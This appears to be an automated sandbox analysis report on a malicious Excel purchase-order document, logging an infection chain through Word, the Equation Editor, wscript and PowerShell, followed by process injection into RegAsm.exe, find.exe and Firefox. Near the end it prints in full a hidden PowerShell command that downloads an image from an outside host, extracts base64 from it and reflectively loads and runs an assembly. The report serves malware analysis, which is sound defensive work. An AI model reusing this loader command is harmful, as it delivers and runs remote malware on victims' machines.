            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028C2A15 push cs; retf 12_2_028C2A1A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028C3BD2 push edx; retf 12_2_028C3BD3
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028CFBE9 push esp; ret 12_2_028CFBEA
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028D3376 push eax; iretd 12_2_028D3377
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028CD8F1 push edx; iretd 12_2_028CD8F8
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028D618D push FFFFFFC3h; retf 12_2_028D61B4
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028D3715 push es; retf 12_2_028D3716
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028D0CAA push edi; iretd 12_2_028D0CAB
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028CFCD2 push esp; retf 12_2_028CFCD3
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Code function: 12_2_028CF5EF push edx; retf 12_2_028CF5F0

            Persistence and Installation Behavior

            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\jiourl.com@SSL\DavWWWRoot
            Source: Office document LLM: Score: 9 Reasons: The screenshot shows a visually prominent message with the Microsoft Office logo stating 'This document is protected'. This type of message is often used to create a sense of urgency or necessity to click on a link to view the document. The presence of a well-known brand (Microsoft Office) adds to the credibility and can mislead users into believing the document is legitimate. The context of the document being an invoice further increases the likelihood of the user wanting to access it urgently. These factors combined indicate a high risk of phishing or malware.
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File dump: seethesmoothofbutterburnwhichtasteofentirethingstounderrstnadwellthebuttersmoothchocolateburneatwellwith_______sweetandhotburn[1].doc.0.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 1288490C.doc.3.dr
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
            Source: C:\Windows\SysWOW64\find.exe File created: C:\Users\user\AppData\Local\Temp\sqlite3.dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\find.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\find.exe Process information set: NOOPENFILEERRORBOX
            Source: Mac Purchase Order PO102935.xls Stream path 'Workbook' entropy: 7.99908815961 (max. 8.0)
            Source: 5B430000.0.dr Stream path 'Workbook' entropy: 7.99892022178 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_02300101 rdtsc 11_2_02300101
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 890
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1982
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 891
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2386
            Source: C:\Windows\SysWOW64\find.exe Window / User API: threadDelayed 389
            Source: C:\Windows\SysWOW64\find.exe Window / User API: threadDelayed 9571
            Source: C:\Windows\SysWOW64\find.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
            Source: C:\Windows\SysWOW64\find.exe API coverage: 2.5 %
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1960 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3220 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep count: 891 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268 Thread sleep count: 2386 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3264 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\find.exe TID: 3448 Thread sleep count: 389 > 30
            Source: C:\Windows\SysWOW64\find.exe TID: 3448 Thread sleep time: -778000s >= -30000s
            Source: C:\Windows\SysWOW64\find.exe TID: 3496 Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\SysWOW64\find.exe TID: 3448 Thread sleep count: 9571 > 30
            Source: C:\Windows\SysWOW64\find.exe TID: 3448 Thread sleep time: -19142000s >= -30000s
            Source: C:\Windows\SysWOW64\find.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\find.exe File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
            Source: C:\Windows\SysWOW64\find.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
            Source: C:\Windows\SysWOW64\find.exe Code function: 13_2_61E1825F sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,13_2_61E1825F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\find.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022B07AC NtCreateMutant,LdrInitializeThunk,11_2_022B07AC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022A0080 mov ecx, dword ptr fs:[00000030h] 11_2_022A0080
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022A00EA mov eax, dword ptr fs:[00000030h] 11_2_022A00EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_022C26F8 mov eax, dword ptr fs:[00000030h] 11_2_022C26F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3148, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload omitted]
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtQueryInformationProcess: Direct from: 0x774CFAFA
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtCreateUserProcess: Direct from: 0x774D093E
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtCreateKey: Direct from: 0x774CFB62
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtQuerySystemInformation: Direct from: 0x774D20DE
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtQueryDirectoryFile: Direct from: 0x774CFDBA
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtClose: Direct from: 0x774CFA02
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtWriteVirtualMemory: Direct from: 0x774D213E
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtCreateFile: Direct from: 0x774D00D6
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtSetTimer: Direct from: 0x774D021A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtOpenFile: Direct from: 0x774CFD86
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtSetInformationThread: Direct from: 0x774E9893
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtOpenKeyEx: Direct from: 0x774CFA4A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtAllocateVirtualMemory: Direct from: 0x774CFAE2
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtResumeThread: Direct from: 0x774D008D
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtOpenKeyEx: Direct from: 0x774D103A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtUnmapViewOfSection: Direct from: 0x774CFCA2
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtDelayExecution: Direct from: 0x774CFDA1
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtSetInformationProcess: Direct from: 0x774CFB4A
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtSetInformationThread: Direct from: 0x774CF9CE
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtReadFile: Direct from: 0x774CF915
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe NtMapViewOfSection: Direct from: 0x774CFC72
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtCreateThreadEx: Direct from: 0x774D08C6Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtDeviceIoControlFile: Direct from: 0x774CF931Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtRequestWaitReplyPort: Direct from: 0x753C6BCEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryValueKey: Direct from: 0x774CFACAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtOpenSection: Direct from: 0x774CFDEAJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtProtectVirtualMemory: Direct from: 0x774D005AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtWriteVirtualMemory: Direct from: 0x774CFE36Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeSection loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeThread APC queued: target process: C:\Program Files (x86)\ZEVsUMapQKVaqpuhNHfEXGSJeosbJVNpqTIYrHdYUvbAncuTWy\wfbjvizcWo.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\mekissedbutterburnwithstrong.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded command string]'
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] 